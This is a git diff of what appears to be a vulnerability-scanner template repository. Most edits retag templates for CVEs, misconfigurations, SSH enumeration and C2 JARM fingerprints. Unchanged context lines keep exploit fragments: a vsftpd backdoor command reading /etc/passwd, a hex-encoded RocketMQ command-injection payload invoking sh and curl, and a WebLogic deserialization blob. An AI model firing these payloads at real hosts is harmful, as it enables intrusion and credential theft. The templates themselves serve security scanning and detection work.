@@ info: verified: "true" max-request: 2 shodan-query: http.favicon.hash:557327884 - tags: temporal,unauth + tags: misconfig,temporal,unauth http: - method: GET diff --git a/http/misconfiguration/woodwing-git.yaml b/http/misconfiguration/woodwing-git.yaml index 4f701c1528..ddc40574c6 100644 --- a/http/misconfiguration/woodwing-git.yaml +++ b/http/misconfiguration/woodwing-git.yaml @@ -9,7 +9,7 @@ info: metadata: shodan-query: http.title:"WoodWing Studio Server" fofa-query: title=="WoodWing Studio Server" - tags: woodwing,git,config + tags: misconfig,woodwing,git,config http: - method: GET diff --git a/http/misconfiguration/woodwing-phpinfo.yaml b/http/misconfiguration/woodwing-phpinfo.yaml index 2cc72aa7a2..c50553aa81 100644 --- a/http/misconfiguration/woodwing-phpinfo.yaml +++ b/http/misconfiguration/woodwing-phpinfo.yaml @@ -9,7 +9,7 @@ info: metadata: shodan-query: http.title:"WoodWing Studio Server" fofa-query: title=="WoodWing Studio Server" - tags: woodwing,phpinfo + tags: misconfig,woodwing,phpinfo http: - method: GET diff --git a/http/misconfiguration/zabbix-dashboards-access.yaml b/http/misconfiguration/zabbix-dashboards-access.yaml index 77c238da9d..7f7e3849f9 100644 --- a/http/misconfiguration/zabbix-dashboards-access.yaml +++ b/http/misconfiguration/zabbix-dashboards-access.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: edb,packetstorm,zabbix,unauth,misconfig + tags: edb,packetstorm,zabbix,unauth,misconfig,xss http: - method: GET diff --git a/http/misconfiguration/zenphoto-sensitive-info.yaml b/http/misconfiguration/zenphoto-sensitive-info.yaml index 389024f746..107c3d513b 100644 --- a/http/misconfiguration/zenphoto-sensitive-info.yaml +++ b/http/misconfiguration/zenphoto-sensitive-info.yaml @@ -7,7 +7,7 @@ info: description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure metadata: max-request: 4 - tags: unauth + tags: misconfig,unauth http: - method: GET diff --git a/http/vulnerabilities/kkfileview-ssrf.yaml b/http/vulnerabilities/kkfileview-ssrf.yaml index 9f8993ea00..fe49c1d523 100644 --- a/http/vulnerabilities/kkfileview-ssrf.yaml +++ b/http/vulnerabilities/kkfileview-ssrf.yaml @@ -18,7 +18,7 @@ info: product: kkfileview shodan-query: http.html:"kkFileView" fofa-query: app="kkFileView" - tags: ssrf,kkfileview + tags: ssrf,kkfileview,keking http: - method: GET diff --git a/http/vulnerabilities/other/eris-xss.yaml b/http/vulnerabilities/other/eris-xss.yaml index 779b36574f..949a4acfe2 100644 --- a/http/vulnerabilities/other/eris-xss.yaml +++ b/http/vulnerabilities/other/eris-xss.yaml @@ -15,7 +15,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2022,xss,eris + tags: cve,cve2022,xss,eris,sqli http: - raw: diff --git a/http/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/http/vulnerabilities/other/geovision-geowebserver-lfi.yaml index 85d8f11be9..7252d8c51b 100644 --- a/http/vulnerabilities/other/geovision-geowebserver-lfi.yaml +++ b/http/vulnerabilities/other/geovision-geowebserver-lfi.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-22 metadata: max-request: 2 - tags: packetstorm,geowebserver,lfi + tags: packetstorm,geowebserver,lfi,xss http: - method: GET diff --git a/http/vulnerabilities/other/mcafee-epo-rce.yaml b/http/vulnerabilities/other/mcafee-epo-rce.yaml index b517b309c3..060ac643a6 100644 --- a/http/vulnerabilities/other/mcafee-epo-rce.yaml +++ b/http/vulnerabilities/other/mcafee-epo-rce.yaml @@ -10,7 +10,7 @@ info: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ metadata: max-request: 1 - tags: mcafee,rce, + tags: mcafee,rce http: - method: GET diff --git a/http/vulnerabilities/other/nextjs-redirect.yaml b/http/vulnerabilities/other/nextjs-redirect.yaml index 6b58430e4b..2914db3bc4 100644 --- a/http/vulnerabilities/other/nextjs-redirect.yaml +++ b/http/vulnerabilities/other/nextjs-redirect.yaml @@ -16,7 +16,7 @@ info: metadata: max-request: 1 shodan-query: html:"/_next/static" - tags: redirect,nextjs + tags: redirect,nextjs,xss http: - method: GET diff --git a/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml b/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml index 2d74efe58f..c4d11ed485 100644 --- a/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml +++ b/http/vulnerabilities/other/orbiteam-bscw-server-lfi.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-22 metadata: max-request: 1 - tags: bscw,orbiteam,lfi,unauth,packetstorm + tags: bscw,orbiteam,lfi,unauth,packetstorm,xss http: - method: GET diff --git a/http/vulnerabilities/other/pbootcms-database-file-download.yaml b/http/vulnerabilities/other/pbootcms-database-file-download.yaml index f392eb91a9..2776d61634 100644 --- a/http/vulnerabilities/other/pbootcms-database-file-download.yaml +++ b/http/vulnerabilities/other/pbootcms-database-file-download.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-89 metadata: max-request: 1 - tags: pbootcms,db,exposure,database,sqlite + tags: pbootcms,db,exposure,database,sqlite,sqli http: - method: GET diff --git a/http/vulnerabilities/other/vpms-auth-bypass.yaml b/http/vulnerabilities/other/vpms-auth-bypass.yaml index eb7d7d7ad2..61422e0400 100644 --- a/http/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/http/vulnerabilities/other/vpms-auth-bypass.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-89 metadata: max-request: 1 - tags: auth-bypass,edb + tags: auth-bypass,edb,sqli http: - raw: diff --git a/http/vulnerabilities/other/zms-auth-bypass.yaml b/http/vulnerabilities/other/zms-auth-bypass.yaml index 9b611d8841..540f91a11c 100644 --- a/http/vulnerabilities/other/zms-auth-bypass.yaml +++ b/http/vulnerabilities/other/zms-auth-bypass.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-89 metadata: max-request: 1 - tags: edb,auth-bypass,packetstorm,zms + tags: edb,auth-bypass,packetstorm,zms,sqli http: - raw: diff --git a/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml b/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml index aa08d06509..8280921fd1 100644 --- a/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml +++ b/http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml @@ -9,7 +9,7 @@ info: - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection metadata: max-request: 1 - tags: thinkphp,vulhub + tags: thinkphp,vulhub,sqli http: - method: GET diff --git a/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml b/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml index dfd4444245..c2c2e205cb 100644 --- a/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml +++ b/http/vulnerabilities/wordpress/avchat-video-chat-xss.yaml @@ -16,7 +16,7 @@ info: metadata: verified: true max-request: 1 - tags: xss,,wp,wpscan,wordpress,wp-plugin + tags: xss,wp,wpscan,wordpress,wp-plugin http: - method: GET diff --git a/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml b/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml index 9a62c72cbc..9dcb888cce 100644 --- a/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/qwiz-online-quizzes-and-flashcards/" - tags: wordpress,wp-plugin,wp,wpscan,packetstorm,qwiz-online-quizzes-and-flashcards + tags: wordpress,wp-plugin,wp,wpscan,packetstorm,qwiz-online-quizzes-and-flashcards,xss http: - raw: diff --git a/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml b/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml index 9091f13594..ef71613336 100644 --- a/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml +++ b/http/vulnerabilities/wordpress/wp-tinymce-lfi.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-22 metadata: max-request: 1 - tags: wordpress,wp-theme,lfi,wordpress,tinymce + tags: wordpress,wp-theme,lfi,tinymce http: - method: GET diff --git a/javascript/cves/2016/CVE-2016-8706.yaml b/javascript/cves/2016/CVE-2016-8706.yaml index 2b8f5c040c..89f1f56e29 100644 --- a/javascript/cves/2016/CVE-2016-8706.yaml +++ b/javascript/cves/2016/CVE-2016-8706.yaml @@ -25,7 +25,7 @@ info: vendor: memcached product: memcached verfied: true - tags: cve,cve2016,rce,js,memcached + tags: cve2016,cve,js,rce,memcached javascript: - code: | diff --git a/javascript/cves/2023/CVE-2023-34039.yaml b/javascript/cves/2023/CVE-2023-34039.yaml index 3988ad5526..7cdb98132f 100644 --- a/javascript/cves/2023/CVE-2023-34039.yaml +++ b/javascript/cves/2023/CVE-2023-34039.yaml @@ -29,7 +29,7 @@ info: verified: true vendor: vmware product: aria_operations_for_networks - tags: js,packetstorm,cve,cve2019,vmware,aria,rce,fuzz,vrealize + tags: cve,js,cve2023,packetstorm,vmware,aria,rce,fuzz,vrealize variables: keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml index 1345794b64..482c2b8afa 100644 --- a/javascript/cves/2023/CVE-2023-46604.yaml +++ b/javascript/cves/2023/CVE-2023-46604.yaml @@ -27,7 +27,7 @@ info: vendor: apache product: activemq shodan-query: product:"ActiveMQ OpenWire Transport" - tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev + tags: cve,js,cve2023,network,rce,apache,activemq,deserialization,kev variables: prefix: "1f00000000000000000001010042" diff --git a/javascript/detection/oracle-tns-listener.yaml b/javascript/detection/oracle-tns-listener.yaml index 293b3fe371..4fb0633f8a 100644 --- a/javascript/detection/oracle-tns-listener.yaml +++ b/javascript/detection/oracle-tns-listener.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: product:"Oracle TNS Listener" - tags: js,oracle,tns,network + tags: js,detect,oracle,tns,network javascript: - code: | diff --git a/javascript/detection/ssh-auth-methods.yaml b/javascript/detection/ssh-auth-methods.yaml index 0df9ed3b4c..b1a1af7062 100644 --- a/javascript/detection/ssh-auth-methods.yaml +++ b/javascript/detection/ssh-auth-methods.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: product:"OpenSSH" - tags: ssh,js,enum,network + tags: js,detect,ssh,enum,network javascript: - code: | diff --git a/javascript/enumeration/ssh/obsolete-ssh-version.yaml b/javascript/enumeration/ssh/obsolete-ssh-version.yaml index 46ebccf73e..4082207f60 100644 --- a/javascript/enumeration/ssh/obsolete-ssh-version.yaml +++ b/javascript/enumeration/ssh/obsolete-ssh-version.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 2 shodan-query: port:22 - tags: js,ssh,network + tags: enum,js,ssh,network javascript: - pre-condition: | diff --git a/javascript/enumeration/ssh/ssh-cbc-mode-ciphers.yaml b/javascript/enumeration/ssh/ssh-cbc-mode-ciphers.yaml index 7082bf3fdf..e2b6abab0c 100644 --- a/javascript/enumeration/ssh/ssh-cbc-mode-ciphers.yaml +++ b/javascript/enumeration/ssh/ssh-cbc-mode-ciphers.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: product:"OpenSSH" - tags: js,ssh,misconfig,network + tags: js,enum,ssh,misconfig,network javascript: - pre-condition: | diff --git a/javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml b/javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml index ab45dbe3e5..dc75357933 100644 --- a/javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml +++ b/javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: product:"OpenSSH" - tags: js,ssh,misconfig,network + tags: js,enum,ssh,misconfig,network javascript: - pre-condition: | diff --git a/javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml b/javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml index ab617aae12..a22e78b0b2 100644 --- a/javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml +++ b/javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: product:"OpenSSH" - tags: js,ssh,misconfig,network + tags: enum,js,ssh,misconfig,network javascript: - pre-condition: | diff --git a/javascript/enumeration/ssh/ssh-weak-algo-supported.yaml b/javascript/enumeration/ssh/ssh-weak-algo-supported.yaml index 5fa66381ca..fc83b35197 100644 --- a/javascript/enumeration/ssh/ssh-weak-algo-supported.yaml +++ b/javascript/enumeration/ssh/ssh-weak-algo-supported.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: product:"OpenSSH" - tags: js,ssh,misconfig,network + tags: js,enum,ssh,misconfig,network javascript: - pre-condition: | diff --git a/javascript/enumeration/ssh/ssh-weak-mac-algo.yaml b/javascript/enumeration/ssh/ssh-weak-mac-algo.yaml index c5909cb18e..628c05030a 100644 --- a/javascript/enumeration/ssh/ssh-weak-mac-algo.yaml +++ b/javascript/enumeration/ssh/ssh-weak-mac-algo.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: product:"OpenSSH" - tags: js,ssh,misconfig,network + tags: js,enum,ssh,misconfig,network javascript: - pre-condition: | diff --git a/javascript/enumeration/ssh/ssh-weak-public-key.yaml b/javascript/enumeration/ssh/ssh-weak-public-key.yaml index 3eb7db5a75..654db50011 100644 --- a/javascript/enumeration/ssh/ssh-weak-public-key.yaml +++ b/javascript/enumeration/ssh/ssh-weak-public-key.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: product:"OpenSSH" - tags: js,ssh,misconfig,network + tags: enum,js,ssh,misconfig,network variables: ecdsa_bit: '256' # 256 bytes = 2048 bits diff --git a/javascript/enumeration/ssh/ssh-weakkey-exchange-algo.yaml b/javascript/enumeration/ssh/ssh-weakkey-exchange-algo.yaml index f883f976df..3bf936f15d 100644 --- a/javascript/enumeration/ssh/ssh-weakkey-exchange-algo.yaml +++ b/javascript/enumeration/ssh/ssh-weakkey-exchange-algo.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: product:"OpenSSH" - tags: js,ssh,misconfig,network + tags: js,enum,ssh,misconfig,network javascript: - pre-condition: | diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml index 2468298527..2c096f17be 100644 --- a/network/cves/2001/CVE-2001-1473.yaml +++ b/network/cves/2001/CVE-2001-1473.yaml @@ -22,7 +22,7 @@ info: max-request: 1 product: ssh vendor: ssh - tags: cve,cve2001,network,ssh,openssh + tags: network,cve2001,cve,ssh,openssh tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2011/CVE-2011-2523.yaml b/network/cves/2011/CVE-2011-2523.yaml index ec8cf0aa8f..ee4d8ed479 100644 --- a/network/cves/2011/CVE-2011-2523.yaml +++ b/network/cves/2011/CVE-2011-2523.yaml @@ -29,7 +29,7 @@ info: vendor: vsftpd_project product: vsftpd shodan-query: product:"vsftpd" - tags: cve,cve2011,network,vsftpd,ftp,backdoor + tags: cve2011,network,cve,vsftpd,ftp,backdoor,vsftpd_project variables: cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs tcp: diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml index afe13ceb48..30745116a5 100644 --- a/network/cves/2015/CVE-2015-3306.yaml +++ b/network/cves/2015/CVE-2015-3306.yaml @@ -25,7 +25,7 @@ info: max-request: 1 product: proftpd vendor: proftpd - tags: cve,cve2015,ftp,rce,network,proftpd,edb + tags: cve2015,cve,network,ftp,rce,proftpd,edb tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml index 35d62d50ff..a9132a831a 100644 --- a/network/cves/2016/CVE-2016-2004.yaml +++ b/network/cves/2016/CVE-2016-2004.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: hp product: data_protector - tags: cve,cve2016,network,iot,hp,rce,edb + tags: cve2016,network,cve,iot,hp,rce,edb tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index 2a35c07609..10d5e26cc9 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -20,7 +20,7 @@ info: epss-score: 0.0162 metadata: verified: true - tags: cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network + tags: cve2016,network,cve,oracle,weblogic,t3,rce,oast,deserialization variables: start: "016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000" diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml index 560abff103..fa89c477cb 100644 --- a/network/cves/2017/CVE-2017-3881.yaml +++ b/network/cves/2017/CVE-2017-3881.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: cisco product: ios - tags: cve,cve2017,cisco,rce,network,kev,msf + tags: cve2017,network,cve,cisco,rce,kev,msf tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml index aad7d9a325..78c76dee0e 100644 --- a/network/cves/2017/CVE-2017-5645.yaml +++ b/network/cves/2017/CVE-2017-5645.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: apache product: log4j - tags: cve,cve2017,vulhub,network,apache,log4j,rce,deserialization,oast, + tags: cve,cve2017,network,vulhub,apache,log4j,rce,deserialization,oast variables: end: "\r\n" tcp: diff --git a/network/cves/2018/CVE-2018-2628.yaml b/network/cves/2018/CVE-2018-2628.yaml index 3f4bce9eb3..aae27610e1 100644 --- a/network/cves/2018/CVE-2018-2628.yaml +++ b/network/cves/2018/CVE-2018-2628.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: oracle product: weblogic_server - tags: cve,cve2018,oracle,weblogic,network,deserialization,kev + tags: network,cve2018,cve,oracle,weblogic,deserialization,kev tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml index ab5ab965ce..4182be900d 100644 --- a/network/cves/2018/CVE-2018-2893.yaml +++ b/network/cves/2018/CVE-2018-2893.yaml @@ -21,7 +21,7 @@ info: epss-score: 0.97346 metadata: max-request: 2 - tags: cve,cve2018,weblogic,network,deserialization,rce,oracle + tags: network,cve2018,cve,weblogic,deserialization,rce,oracle tcp: - inputs: - data: "t3 12.2.1 diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml index 26442bcb45..2c55b82dff 100644 --- a/network/cves/2020/CVE-2020-1938.yaml +++ b/network/cves/2020/CVE-2020-1938.yaml @@ -26,7 +26,7 @@ info: vendor: apache product: geode shodan-query: title:"Apache Tomcat" - tags: cve,cve2020,kev,tenable,apache,lfi,network,tomcat,ajp + tags: cve,cve2020,network,kev,tenable,apache,lfi,tomcat,ajp tcp: - host: diff --git a/network/cves/2020/CVE-2020-7247.yaml b/network/cves/2020/CVE-2020-7247.yaml index cd06d89738..fa57eef2da 100644 --- a/network/cves/2020/CVE-2020-7247.yaml +++ b/network/cves/2020/CVE-2020-7247.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: openbsd product: opensmtpd - tags: cve,cve2020,smtp,opensmtpd,network,rce,oast,kev + tags: network,cve,cve2020,smtp,opensmtpd,rce,oast,kev,openbsd tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml index 9bbf092688..8e81240a01 100644 --- a/network/cves/2022/CVE-2022-24706.yaml +++ b/network/cves/2022/CVE-2022-24706.yaml @@ -29,7 +29,7 @@ info: vendor: apache product: couchdb shodan-query: product:"CouchDB" - tags: cve,cve2022,network,couch,rce,kev,couchdb + tags: cve2022,network,cve,couch,rce,kev,couchdb,apache variables: name_msg: "00156e00050007499c4141414141414041414141414141" diff --git a/network/cves/2022/CVE-2022-31793.yaml b/network/cves/2022/CVE-2022-31793.yaml index ff5136b516..0014baced3 100644 --- a/network/cves/2022/CVE-2022-31793.yaml +++ b/network/cves/2022/CVE-2022-31793.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: inglorion product: muhttpd - tags: cve,cve2022,network,muhttpd,lfi,unauth + tags: network,cve,cve2022,muhttpd,lfi,unauth,inglorion tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml index e62f0c2961..71f6a1dffb 100644 --- a/network/cves/2023/CVE-2023-33246.yaml +++ b/network/cves/2023/CVE-2023-33246.yaml @@ -29,7 +29,7 @@ info: shodan-query: title:"RocketMQ" vendor: apache verified: true - tags: cve,cve2023,rocketmq,rce,oast,intrusive,network + tags: network,cve2023,cve,rocketmq,rce,oast,intrusive,apache variables: part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}' part_b: '{{ hex_decode("3b0a") }}' diff --git a/network/detection/ws_ftp-ssh-detect.yaml b/network/detection/ws_ftp-ssh-detect.yaml index 33c33cf50f..a672dc1618 100644 --- a/network/detection/ws_ftp-ssh-detect.yaml +++ b/network/detection/ws_ftp-ssh-detect.yaml @@ -16,7 +16,7 @@ info: vendor: progress product: ws_ftp shodan-query: "WS_FTP port:22" - tags: network,ssh,ws_ftp,detect + tags: network,ssh,ws_ftp,detect,progress tcp: - host: diff --git a/network/jarm/c2/cobalt-strike-c2-jarm.yaml b/network/jarm/c2/cobalt-strike-c2-jarm.yaml index 17b92f2e72..0e67fb3e08 100644 --- a/network/jarm/c2/cobalt-strike-c2-jarm.yaml +++ b/network/jarm/c2/cobalt-strike-c2-jarm.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1+port:443 - tags: jarm,c2,ir,osint,cti,cobalt-strike + tags: jarm,network,c2,ir,osint,cti,cobalt-strike tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/covenant-c2-jarm.yaml b/network/jarm/c2/covenant-c2-jarm.yaml index 56fba2778c..13cc52f89c 100644 --- a/network/jarm/c2/covenant-c2-jarm.yaml +++ b/network/jarm/c2/covenant-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://twitter.com/MichalKoczwara/status/1548685058403360770 metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,covenant + tags: jarm,network,c2,ir,osint,cti,covenant tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/evilginx2-jarm.yaml b/network/jarm/c2/evilginx2-jarm.yaml index fcbd10c537..6974e658a0 100644 --- a/network/jarm/c2/evilginx2-jarm.yaml +++ b/network/jarm/c2/evilginx2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/kgretzky/evilginx2 metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,evilginx2,phishing + tags: jarm,network,c2,ir,osint,cti,evilginx2,phishing tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/grat2-c2-jarm.yaml b/network/jarm/c2/grat2-c2-jarm.yaml index a34ec91e06..9bd4110648 100644 --- a/network/jarm/c2/grat2-c2-jarm.yaml +++ b/network/jarm/c2/grat2-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/r3nhat/GRAT2 metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,shad0w + tags: c2,jarm,network,ir,osint,cti,shad0w tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/mac-c2-jarm.yaml b/network/jarm/c2/mac-c2-jarm.yaml index ec0d79f415..445881b9d0 100644 --- a/network/jarm/c2/mac-c2-jarm.yaml +++ b/network/jarm/c2/mac-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/cedowens/MacC2 metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,macc2 + tags: jarm,network,c2,ir,osint,cti,macc2 tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/macshell-c2-jarm.yaml b/network/jarm/c2/macshell-c2-jarm.yaml index 04a0df3c28..fa5cde1458 100644 --- a/network/jarm/c2/macshell-c2-jarm.yaml +++ b/network/jarm/c2/macshell-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/cedowens/MacShellSwift metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,macshell + tags: jarm,network,c2,ir,osint,cti,macshell tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/merlin-c2-jarm.yaml b/network/jarm/c2/merlin-c2-jarm.yaml index 3fcfe4c068..d9bf6dee2d 100644 --- a/network/jarm/c2/merlin-c2-jarm.yaml +++ b/network/jarm/c2/merlin-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://merlin-c2.readthedocs.io/en/latest/ metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,merlin + tags: jarm,network,c2,ir,osint,cti,merlin tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/metasploit-c2-jarm.yaml b/network/jarm/c2/metasploit-c2-jarm.yaml index 9485c43454..a0bce4771c 100644 --- a/network/jarm/c2/metasploit-c2-jarm.yaml +++ b/network/jarm/c2/metasploit-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,metasploit + tags: jarm,network,c2,ir,osint,cti,metasploit tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/mythic-c2-jarm.yaml b/network/jarm/c2/mythic-c2-jarm.yaml index e232b95a36..cf882b1f46 100644 --- a/network/jarm/c2/mythic-c2-jarm.yaml +++ b/network/jarm/c2/mythic-c2-jarm.yaml @@ -12,7 +12,7 @@ info: - https://www.socinvestigation.com/shodan-filters-to-hunt-adversaries-infrastructure-and-c2/ metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,mythic + tags: jarm,network,c2,ir,osint,cti,mythic tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/posh-c2-jarm.yaml b/network/jarm/c2/posh-c2-jarm.yaml index de528cb388..31def104ef 100644 --- a/network/jarm/c2/posh-c2-jarm.yaml +++ b/network/jarm/c2/posh-c2-jarm.yaml @@ -12,7 +12,7 @@ info: - https://poshc2.readthedocs.io/en/latest/ metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,posh + tags: jarm,network,c2,ir,osint,cti,posh tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/shad0w-c2-jarm.yaml b/network/jarm/c2/shad0w-c2-jarm.yaml index ef211e6ad0..10735843a3 100644 --- a/network/jarm/c2/shad0w-c2-jarm.yaml +++ b/network/jarm/c2/shad0w-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/bats3c/shad0w metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,shad0w + tags: jarm,network,c2,ir,osint,cti,shad0w tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/silenttrinity-c2-jarm.yaml b/network/jarm/c2/silenttrinity-c2-jarm.yaml index 76ef796975..2142d6a012 100644 --- a/network/jarm/c2/silenttrinity-c2-jarm.yaml +++ b/network/jarm/c2/silenttrinity-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/byt3bl33d3r/SILENTTRINITY metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,silenttrinity + tags: jarm,network,c2,ir,osint,cti,silenttrinity tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/sliver-c2-jarm.yaml b/network/jarm/c2/sliver-c2-jarm.yaml index c9e60bc00b..ad8e00a34f 100644 --- a/network/jarm/c2/sliver-c2-jarm.yaml +++ b/network/jarm/c2/sliver-c2-jarm.yaml @@ -11,7 +11,7 @@ info: - https://github.com/BishopFox/sliver metadata: max-request: 1 - tags: jarm,c2,ir,osint,cti,sliver + tags: jarm,network,c2,ir,osint,cti,sliver tcp: - inputs: - data: 2E diff --git a/network/misconfig/erlang-daemon.yaml b/network/misconfig/erlang-daemon.yaml index b32ad6c6ad..686933cd1f 100644 --- a/network/misconfig/erlang-daemon.yaml +++ b/network/misconfig/erlang-daemon.yaml @@ -13,7 +13,7 @@ info: metadata: verified: "true" shodan-query: product:"Erlang Port Mapper Daemon" - tags: demon,enum,erlang,epmd + tags: network,misconfig,demon,enum,erlang,epmd network: - inputs: diff --git 